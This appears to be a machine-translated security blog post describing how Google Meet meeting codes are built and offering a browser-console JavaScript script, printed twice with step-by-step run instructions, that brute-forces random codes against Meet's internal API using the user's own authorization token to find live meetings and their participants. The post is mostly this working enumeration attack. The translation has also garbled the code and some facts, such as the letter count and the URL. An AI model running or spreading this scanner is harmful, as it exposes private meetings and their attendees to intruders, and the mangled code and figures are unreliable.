VISIO – Get stuck in Google Meet | Dyrk, Dyna Meet – Visio

⋅

Meet Visio

randomize = () => dico = dico.Split (”).MAP (Value => (< value, sort: Math.random() >)).spell ((a, b) => a.spell – b.spell).MAP ((< value >) => value).Join (”),
Newpatternkey = () => “xxx-xxxx-xxx”.Split (”).MAP (C => C == ‘-‘?C: String.fromcharcode (math.Floor (Math.Random ()*25) +97)).Join (”),
Key = Newpatternkey (), Counter = 20;
Next = () => Key.Split (”).MAP (E => E == ‘-‘ ? E: Dico [Dico.Indexof (e) + 1> = Dico.length ? 0: Dico.Indexof (e) + 1]).Join (”),
Counter = 0;
meetlink = ‘https: // meet.Google.com/’, available toe = () => xHR = new xmlhttprequest ();
If (Counter ++> = 20) Counter = 0;
Key = Newpatternkey ();
Randomize ();
>
Key = Next ();
xhr.Open (‘Get’, Meetlink + Key);
xhr.Addeventlisner (‘load’, (e) => fetch (meetlink.concat (“/$ rpc/google.RTC.meetings.V1.MeetingSpaceService/ResolvemeetingSpace “),” Headers “:” Authorization “: Authorization,
“Content-Type”: “Application/X-Protobuf”,
“X-Goog-Adep-Key”: E.target.responsibility.Match (/\ [“https \: \/\/Meet \.Google\.com \ “\,” ([A-Za-Z0-9 \ _ \-]) “\]/) [1],
“X-Goog-Authuse”: “0”,
“X-Goog-enCode-Réspose-IF-EXECUTABLE”: “BASE64”,
“X-Goog-Meeting-identifier”: Btoa (‘\ B \ X02 \ X12 \ F’.Concat (Key)),
>,
“body”: “\ n \ f”.Concat (Key, “0 \ U0001”),
“Method”: “Post”
>).then (e => e.Text ())
.then (e => setTimeout (available, 100);
console.Log (Meetlink.Concat (Key).Beautifydisplay (38), (e.Replace (/[^A-Za-Z0-9]/G, “”)+””).Beautifydisplay (38));
>);
>);
xhr.Send ();
>;
String.prototype.Beautifydisplay = Function (size) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >size ? TXT.Length: size)).Substr (0, size).Concat (‘|’); >,
console.Clear ();
available ();
>) ()

Dyrk

Currently working in the field of cybersecurity, I am regularly faced with fairly trivial situations.

Latest, a person’s intrusion during a meeting .
Fortunately, for safety, Google Meet included a feature allowing both to warn participants that a person seeks to join the videoconference, but also to accept or refuse it.

However, this event brings me to ask myself a number of questions .

Complexity of the Google Meet link

First of all, how is it possible for a person to connect to a meet link without having been invited to it ?

We must consider the simplicity of the link: https: // Google.meet.com/XXX-Yyyy -zzzz

XXX-Yyyy -zzzz are only alphabetical characters between A and Z, ie 27 possible combinations for each character.

For mathematicians, there is therefore:

27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 possible combinations .

Lifespan of a Google Meet link

Although we are now able to better understand how the links of our “Google Meet” conference bonds are built, there is a very important aspect to take into account . The lifespan of a Google Meet link !

Indeed everyone can generate Google Meet meetings in a few clicks.
But after a few days, weeks or months . The links are no longer valid.

The links generated therefore have a certain period of validity .

Exception make “recurring” events, and this is where it becomes interesting.
In business, there are many opportunities to organize regularly (team / business, daily, weekly, monthly,, . )).
When an employee generates this type of event in their agenda, automatically a Google Meet link is generated. This one is invariable.
So you will have the same link each time for this event.

With a little javascript and brute force ?

With all these elements, we are now equipped to sweep all possibilities, and reach a high probabilities to detect links to videoconociates !

So I have a little retro-insured the operation of Google Meet to write a JavaScript code which will try an infinite number of combinations

(C) Dyrk.Org 2023-2024 – Meet’s Roulette
(1) run this script on https: // google.meet.com

(2) Find & Update Authorization’s variable with a valid authorization’s token in your googles’s “xhr Requests” Headers

Let Authorization = “Sapisidhash xxxxxxxxxxxxxx_xxxxxxxxxxxxxxxxxxxxxxxxxxxx“, dico =” abcdefghijklmnopqrstuvxz “,

randomize = () => dico = dico.Split (”).MAP (Value => (< value, sort: Math.random() >)).spell ((a, b) => a.spell – b.spell).MAP ((< value >) => value).Join (”),
Newpatternkey = () => “xxx-xxxx-xxx”.Split (”).MAP (C => C == ‘-‘?C: String.fromcharcode (math.Floor (Math.Random ()*25) +97)).Join (”),
Key = Newpatternkey (), Counter = 20;
Next = () => Key.Split (”).MAP (E => E == ‘-‘ ? E: Dico [Dico.Indexof (e) + 1> = Dico.length ? 0: Dico.Indexof (e) + 1]).Join (”),
Counter = 0;
meetlink = ‘https: // meet.Google.com/’, available toe = () => xHR = new xmlhttprequest ();
If (Counter ++> = 20) Counter = 0;
Key = Newpatternkey ();
Randomize ();
>
Key = Next ();
xhr.Open (‘Get’, Meetlink + Key);
xhr.Addeventlisner (‘load’, (e) => fetch (meetlink.concat (“/$ rpc/google.RTC.meetings.V1.MeetingSpaceService/ResolvemeetingSpace “),” Headers “:” Authorization “: Authorization,
“Content-Type”: “Application/X-Protobuf”,
“X-Goog-Adep-Key”: E.target.responsibility.Match (/\ [“https \: \/\/Meet \.Google\.com \ “\,” ([A-Za-Z0-9 \ _ \-]) “\]/) [1],
“X-Goog-Authuse”: “0”,
“X-Goog-enCode-Réspose-IF-EXECUTABLE”: “BASE64”,
“X-Goog-Meeting-identifier”: Btoa (‘\ B \ X02 \ X12 \ F’.Concat (Key)),
>,
“body”: “\ n \ f”.Concat (Key, “0 \ U0001”),
“Method”: “Post”
>).then (e => e.Text ())
.then (e =>

SetTimeout (available, 100);
console.Log (Meetlink.Concat (Key).Beautifydisplay (38), (e.Replace (/[^A-Za-Z0-9]/G, “”)+””).Beautifydisplay (38));
>);
>);
xhr.Send ();
>;
String.prototype.Beautifydisplay = Function (size) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >size ? TXT.Length: size)).Substr (0, size).Concat (‘|’); >,
console.Clear ();
available ();
>) ()

To operate all of this it will be necessary:

Open the page https: // meet.Google.com
Open the developer console
In the “Network” tab, filter the Fetch / Xhr & Recover a token of token“Authorization”
Copy and paste the source code above and put to the place indicated the token.
Validate with the “Entrance” key on your keyboard.

Recovery of “Authorization” token:

For the curious, this is what the result of this script in action should look like.
We therefore note lines which informs us that the space for videoconference does not exist.
And others that put us up the token of the conference ! Therefore indicating that the link is valid;)

However, do not expect to fall in a few seconds on a meet link ^^
(Unless you are a little lucky man)
You will need to be great patience, letting it run at least half an hour.

Conclusion

Do not panic that there is a greater number of luck to find a valid Google Meet link than winning Loto.

Attention ! A person who comes across a valid meet link access to certain information without the need to be connected:
The name of the meeting (therefore avoid slipping confidential information), and the connected participants (all or a game).

Meet Visio

Online robbery

Best-seller sticker online robbery

players